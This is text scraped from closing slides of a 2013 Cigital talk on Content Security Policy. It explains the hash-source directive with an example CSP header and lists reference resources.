© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Hash-source Directive Will the nonce directive prevent DOM-based XSS in dynamically generated JavaScript? <script> function onButtonClick() … </script> Solution: mark every inline JavaScript with a hash! • Directive 'hash-source' sends a hash of each inline script in the response • The browser hashes every inline JavaScript and compares the hashes Hash the script and add a Base64-encoded value to the CSP header: Content-Security-Policy: default-src 'self'; script-src 'sha256- MWUyMTJjMTc2MWZjZWQzYmY3ZDE0NGZlYmVmYzFkYmYwOTc2OTVkODFkZmNjNjk3OTFmMWJ lYTVmNWJlYThhOA==' 'sha256-Yzg2OWMyMGI2NmZhODU2MjQ0MzBlYWVmYWQ0M2Y1ZTg5 NTljNGE3ZThjYTcyYzI5Y2EzYzJlNGYxODU4ZjM1OQ==' X
21.
21 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Q&A Resources: • W3C Standard for CSP 1.1 http://www.w3.org/TR/CSP11/ • CSP Reference http://content-security-policy.com/ • An Introduction to CSP by Mike West http://www.html5rocks.com/en/tutorials/security/conten t-security-policy/ • Making CSP Work for You by Mark Goodwin https://www.youtube.com/watch?v=F7eCP08nacI&t=2h1 4m16s • Automatic XSS protection with CSP by Neil Matatall https://blog.matatall.com/2013/09/automatic-xss- protection-with-csp-no-changes-required/ • Generating Content-Security-Policies, the easy way http://c0nrad.io/blog/csp.html
22.
22 | Copyright
© 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. @KseniaDmitrieva kdmitrieva@cigital.com
Download now